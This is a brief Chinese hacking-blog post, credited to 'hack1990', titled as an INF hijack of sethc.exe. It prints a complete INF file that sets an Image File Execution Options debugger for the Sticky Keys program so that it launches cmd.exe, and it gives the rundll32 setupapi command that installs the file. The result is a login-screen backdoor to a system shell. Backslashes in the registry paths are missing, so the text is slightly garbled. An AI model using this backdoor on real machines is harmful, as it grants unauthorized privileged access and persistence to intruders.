inf劫持sethc.exe

作者：hack1990 时间：13-06-03 阅读数：840人阅读

[Version]
Signature=”$WINDOWS NT$”
[DefaultInstall]
AddReg=My_AddReg_Name
[My_AddReg_Name]
HKLM,SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution optionssethc.exe,debugger,0×00000000,c:windowssystem32cmd.exe
Command:
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:windowstempname.inf